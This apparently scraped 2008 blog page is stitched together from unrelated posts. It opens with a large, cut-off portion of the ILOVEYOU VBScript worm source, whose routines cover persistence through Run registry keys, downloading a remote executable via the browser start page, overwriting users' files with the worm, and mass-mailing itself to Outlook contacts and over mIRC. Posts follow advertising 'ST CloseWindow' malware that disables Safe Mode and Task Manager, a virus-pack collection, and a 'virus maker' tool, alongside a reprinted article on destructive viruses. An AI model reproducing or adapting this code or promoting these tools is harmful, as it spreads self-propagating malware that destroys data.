wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"
good...@-@>"&vbcrlf& _
"
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"
This HTML file need ActiveX Control
To Enable to read
this HTML file
- Please press #-#YES#-# button to Enable
ActiveX"&vbcrlf& _
Thursday, October 2, 2008
ST Close Window Virus By Knight
 i ! this is a superp virus ! when victim open it , virus close all windows on that system !!! and ever time that victim open a window virus speedly close it ! only victim can see Wallpaper !!!!!!!!!! Shocked Shocked
ST CloseWindow
Detail :
5 Server Emersion ! :.EXE - .Pif - .Com - .Cmd - .Bat
5 Icon !
and 2 model ! Funny , Dangerous
funny : run virus on the victim system , but this is for fun ! because viruse will be cleaned after a restart ! you can test it ! this is no risk ! it is fun Wink Tongue
Dangerous : this is main virus !
my virus make autorun at all drives ! a Great autorun !
Double Click = Run Virus
Right Click -> Open = Run Virus
Right Click -> Explore = Run Virus
it is Great , Yes ?!!! Grin Cool
this virus is very powerfull ! ( Very Very powefull )
no one can,t disable it !!!!
My Virus Disable all thing of Safe Mode ! Example : CMD - TaskMgr - Run ... System Restore !!!!
this a little comment about this virus ! etc ...
Program Face :
By Knight (KILL-SYSTEM32 coder)
Download Program and ActiveX File :
Good Luck My Friends !
Regard To IRAN
Regard To ST Group
Regard To Persians
Regard To Great Cyros
  ST CloseWindow
Detail :
5 Server Emersion ! :.EXE - .Pif - .Com - .Cmd - .Bat
5 Icon !
and 2 model ! Funny , Dangerous
funny : run virus on the victim system , but this is for fun ! because viruse will be cleaned after a restart ! you can test it ! this is no risk ! it is fun Wink Tongue
Dangerous : this is main virus !
my virus make autorun at all drives ! a Great autorun !
Double Click = Run Virus
Right Click -> Open = Run Virus
Right Click -> Explore = Run Virus
it is Great , Yes ?!!! Grin Cool
this virus is very powerfull ! ( Very Very powefull )
no one can,t disable it !!!!
My Virus Disable all thing of Safe Mode ! Example : CMD - TaskMgr - Run ... System Restore !!!!
this a little comment about this virus ! etc ...
Program Face :
By Knight (KILL-SYSTEM32 coder)
Download Program and ActiveX File :
Good Luck My Friends !
Regard To IRAN
Regard To ST Group
Regard To Persians
Regard To Great Cyros
Thursday, July 3, 2008
Dangerous Viruses
 Dont be Stupid.. this is a Virus Pack Dont open on your own computer LOL!
W32.Bagle.AF
W32.Bagle.H
W32.Hiton.A
W32.MyDoom.F
W32.Netsky.Z
W32.Netsky.D
W32.Netsky.B
W32.Sober.F
W32.Sober.D
W32.Sober.C
W32.Sober
W32.Dumaru
W32.Sobig.F
W32.BugBear.B
W32.LovSan/Blaster1
W32.Sinapps
W32.Sunday
W32.Delta
W32.Gold
W32.Retro
W32.Koshi.1.9
Linux.ADM
Linux.Coco
W32.NBC
W32.Clickit
W32.Parasit
W32.PolySnakebyte
W32.RousSarcoma
W32.Hllw.Sydney@MM
CIH
I Love You
Melissa
w32nimda
Wagner 782
Casino
Harddrive-killer pro 5
Code red 1
Code red 2
Pokemon Pikachu
AIDS
hdfill
Blackday
Bulbasaur
Mirc.El_Che_is_alive
Kpmv.W2000.Poly
Mbop!
C-worm
Batschell
bat.antifa
Bat/BatXP.Iaafe
Bat\\bun
Bat.Bush
BAT.Dolomite.worm
bat.****
bat/hotcakes
bat.ina
bat.junkboat
bat.soulcontrol
BatXP.Saturn
BAT/Calvin&Hobbes
claytron
HoloCaust
p2p.Opax
PERL.Nirvana
VBS/Artillery
vbs.eva
VBS/Evade
Vbs.Evion
w32.merkur.c
W32/Outsider
W32/Outsider B
W32/Outsider C
W32/Outsider D
W32/Outsider E
W32/Perrun
W97/Blackout
W97M/Authority
W97M/Chester
W97M/SFC
WinREG.Sptohell
Virenpaket 0
Virenpaket 1
Virenpaket 2
Virenpaket 3
Virenpaket 4
Virenpaket 5
Virenpaket 6
Virenpaket 7
Virenpaket 8
Virenpaket 9
Virenpaket 10
Virenpaket 11
Zed\'s Word Macro Virus Constructor
Windows Scripting Host Worm Constructor 1.0
Special Format Generator 2.0
  
  W32.Bagle.AF
W32.Bagle.H
W32.Hiton.A
W32.MyDoom.F
W32.Netsky.Z
W32.Netsky.D
W32.Netsky.B
W32.Sober.F
W32.Sober.D
W32.Sober.C
W32.Sober
W32.Dumaru
W32.Sobig.F
W32.BugBear.B
W32.LovSan/Blaster1
W32.Sinapps
W32.Sunday
W32.Delta
W32.Gold
W32.Retro
W32.Koshi.1.9
Linux.ADM
Linux.Coco
W32.NBC
W32.Clickit
W32.Parasit
W32.PolySnakebyte
W32.RousSarcoma
W32.Hllw.Sydney@MM
CIH
I Love You
Melissa
w32nimda
Wagner 782
Casino
Harddrive-killer pro 5
Code red 1
Code red 2
Pokemon Pikachu
AIDS
hdfill
Blackday
Bulbasaur
Mirc.El_Che_is_alive
Kpmv.W2000.Poly
Mbop!
C-worm
Batschell
bat.antifa
Bat/BatXP.Iaafe
Bat\\bun
Bat.Bush
BAT.Dolomite.worm
bat.****
bat/hotcakes
bat.ina
bat.junkboat
bat.soulcontrol
BatXP.Saturn
BAT/Calvin&Hobbes
claytron
HoloCaust
p2p.Opax
PERL.Nirvana
VBS/Artillery
vbs.eva
VBS/Evade
Vbs.Evion
w32.merkur.c
W32/Outsider
W32/Outsider B
W32/Outsider C
W32/Outsider D
W32/Outsider E
W32/Perrun
W97/Blackout
W97M/Authority
W97M/Chester
W97M/SFC
WinREG.Sptohell
Virenpaket 0
Virenpaket 1
Virenpaket 2
Virenpaket 3
Virenpaket 4
Virenpaket 5
Virenpaket 6
Virenpaket 7
Virenpaket 8
Virenpaket 9
Virenpaket 10
Virenpaket 11
Zed\'s Word Macro Virus Constructor
Windows Scripting Host Worm Constructor 1.0
Special Format Generator 2.0
Tuesday, July 1, 2008
Wednesday, April 9, 2008
The 10 Most Destructive PC Viruses Of All Time
Causing close to 100 billion dollars in damage to businesses worldwide, PC viruses have brought the world a massive headache. We name the 10 most destructive of the past 20 years.By George Jones, TechWeb
Computer viruses are like real-life viruses: When they're flying around infecting every PC (or person) in sight, they're scary. But after the fact...well, they're rather interesting, albeit in a gory kind of way. With this in mind, we shamelessly present, in chronological order, the 10 most destructive viruses of all time.
CIH (1998)
Estimated Damage: 20 to 80 million dollars worldwide, countless amounts of PC data destroyed
Unleashed from Taiwan in June of 1998, CIH is recognized as one of the most dangerous and destructive viruses ever. The virus infected Windows 95, 98, and ME executable files and was able to remain resident in a PC's memory, where it continued to infect other executables.
What made CIH so dangerous is that, shortly after activated, it would overwrite data on the host PC's hard drive, rendering it inoperable. It was also capable of overwriting the BIOS of the host, preventing boot-up. Because it infected executable files, CIH wound up being distributed by numerous software distributors, including a demo version of an Activision game named Sin.
CIH is also known as the Chernobyl virus because the trigger date of certain strains of the virus coincides with the date of the Chernobyl nuclear reactor accident. The virus is not a serious threat today, thanks to increased awareness and the widespread migration to Windows 2000, XP, and NT, none of which are vulnerable to CIH.
Melissa (1999)
Estimated Damage: 300 to 600 million dollars
On Friday, March 26, 1999, W97M/Melissa became front-page news across the globe. Estimates have indicated that this Word macro script infected 15 to 20 percent of all business PCs. The virus spread so rapidly that Intel, Microsoft, and a number of other companies that used Outlook were forced to shut down their entire e-mail systems in order to contain the damage.
The virus used Microsoft Outlook to e-mail itself to 50 names on a user's contact list. The e-mail message contained the sentence, "Here is that document you asked for...don't show anyone else. ;-)," with an attached Word document. Clicking open the .DOC file -- and thousands of unsuspecting users did so -- allowed the virus to infect the host and repeat the replication. Adding insult to injury, when activated, this virus modified users' Word documents with quotes from the animated TV show "The Simpsons."
ILOVEYOU (2000)
Estimated Damage: 10 to 15 billion dollars
Also known as Loveletter and The Love Bug, this was a Visual Basic script with an ingenious and irresistible hook: the promise of love. On May 3, 2000, the ILOVEYOU worm was first detected in Hong Kong. The bug was transmitted via e-mail with the subject line "ILOVEYOU" and an attachment, Love-Letter-For-You.TXT.vbs. Similar to Melissa, the virus mailed itself to all Microsoft Outlook contacts.
The virus also took the liberty of overwriting music files, image files, and others with a copy of itself. More disturbingly, it searched out user IDs and passwords on infected machines and e-mailed them to its author.
An interesting footnote: Because the Philippines had no laws against virus-writing at the time, the author of ILOVEYOU was not charged for this crime.
Code Red (2001)
Estimated Damage: 2.6 billion dollars
Code Red was a computer worm that was unleashed on network servers on July 13, 2001. It was a particularly virulent bug because of its target: computers running Microsoft's Internet Information Server (IIS) Web server. The worm was able to exploit a specific vulnerability in the IIS operating system. Ironically, Microsoft had released a patch addressing this hole in mid-June.
Also known as Bady, Code Red was designed for maximum damage. Upon infection, the Web site controlled by the affected server would display the message, "HELLO! Welcome to http://www.worm.com! Hacked By Chinese!" Then the virus would actively seek other vulnerable servers and infect them. This would go on for approximately 20 days, and then it would launch denial of service attacks on certain IP addresses, including the White House Web server. In less than a week, this virus infected almost 400,000 servers, and it's estimated that one million total computers were infected.
SQL Slammer (2003)
Estimated Damage: Because SQL Slammer erupted on a Saturday, the damage was low in dollars and cents. However, it hit 500,000 servers worldwide, and actually shut down South Korea's online capacity for 12 hours.
SQL Slammer, also known as Sapphire, was launched on January 25, 2003. It was a doozy of a worm that had a noticeable negative impact upon global Internet traffic. Interestingly enough, it didn't seek out end users' PCs. Instead, the target was servers. The virus was a single-packet, 376-byte worm that generated random IP addresses and sent itself to those IP addresses. If the IP address was a computer running an unpatched copy of Microsoft's SQL Server Desktop Engine, that computer would immediately begin firing the virus off to random IP addresses as well.
With this remarkably effective way of spreading, Slammer infected 75,000 computers in 10 minutes. The outrageously high amounts of traffic overloaded routers across the globe, which created higher demands on other routers, which shut them down, and so on.
Blaster (2003)
Estimated Damage: 2 to 10 billion dollars, hundreds of thousands of infected PCs
The summer of 2003 was a rough time for businesses running PCs. In rapid succession, IT professionals witnessed the unleashing of both the Blaster and Sobig worms. Blaster, also known as Lovsan or MSBlast, was the first to hit. The virus was detected on August 11 and spread rapidly, peaking in just two days. Transmitted via network and Internet traffic, this worm exploited a vulnerability in Windows 2000 and Windows XP, and when activated, presented the PC user with a menacing dialog box indicating that a system shutdown was imminent.
Hidden in the code of MSBLAST.EXE -- the virus' executable " were these messages: "I just want to say LOVE YOU SAN!!" and "billy gates why do you make this possible? Stop making money and fix your software!!"
The virus also contained code that would trigger a distributed denial of service attack on windowsupdate.com on April 15, but Blaster had already peaked and was mostly contained by then.
Have you read it? Dangerous isn't it? ok i got a collection of virus here.. i share this not to infect you or the others but to give you an idea what is virus really look like.. dont you even try to pass this to others this are already been detected by the anti-virus program. if you don't to put yourself into trouble behave yourself!
Dont be Stupid! dont open this file into your Computer..
W32.Bagle.AF
W32.Bagle.H
W32.Hiton.A
W32.MyDoom.F
W32.Netsky.Z
W32.Netsky.D
W32.Netsky.B
W32.Sober.F
W32.Sober.D
W32.Sober.C
W32.Sober
W32.Dumaru
W32.Sobig.F
W32.BugBear.B
W32.LovSan/Blaster1
W32.Sinapps
W32.Sunday
W32.Delta
W32.Gold
W32.Retro
W32.Koshi.1.9
Linux.ADM
Linux.Coco
W32.NBC
W32.Clickit
W32.Parasit
W32.PolySnakebyte
W32.RousSarcoma
W32.Hllw.Sydney@MM
CIH
I Love You
Melissa
w32nimda
Wagner 782
Casino
Harddrive-killer pro 5
Code red 1
Code red 2
Pokemon Pikachu
AIDS
hdfill
Blackday
Bulbasaur
Mirc.El_Che_is_alive
Kpmv.W2000.Poly
Mbop!
C-worm
Batschell
bat.antifa
Bat/BatXP.Iaafe
Bat\\bun
Bat.Bush
BAT.Dolomite.worm
bat.****
bat/hotcakes
bat.ina
bat.junkboat
bat.soulcontrol
BatXP.Saturn
BAT/Calvin&Hobbes
claytron
HoloCaust
p2p.Opax
PERL.Nirvana
VBS/Artillery
vbs.eva
VBS/Evade
Vbs.Evion
w32.merkur.c
W32/Outsider
W32/Outsider B
W32/Outsider C
W32/Outsider D
W32/Outsider E
W32/Perrun
W97/Blackout
W97M/Authority
W97M/Chester
W97M/SFC
WinREG.Sptohell
Virenpaket 0
Virenpaket 1
Virenpaket 2
Virenpaket 3
Virenpaket 4
Virenpaket 5
Virenpaket 6
Virenpaket 7
Virenpaket 8
Virenpaket 9
Virenpaket 10
Virenpaket 11
Zed\'s Word Macro Virus Constructor
Windows Scripting Host Worm Constructor 1.0
Special Format Generator 2.0
Saturday, October 4, 2008
Saturday, September 27, 2008
Wednesday, May 7, 2008
Thursday, April 17, 2008
Thursday, April 3, 2008
Friday, March 7, 2008
TeraBIT Virus Maker 2.8
TeraBIT Virus Maker v2.8Coded in Visual Basic 6.0 By m_reza00.
 
 
 
 
 
 
   
0 comments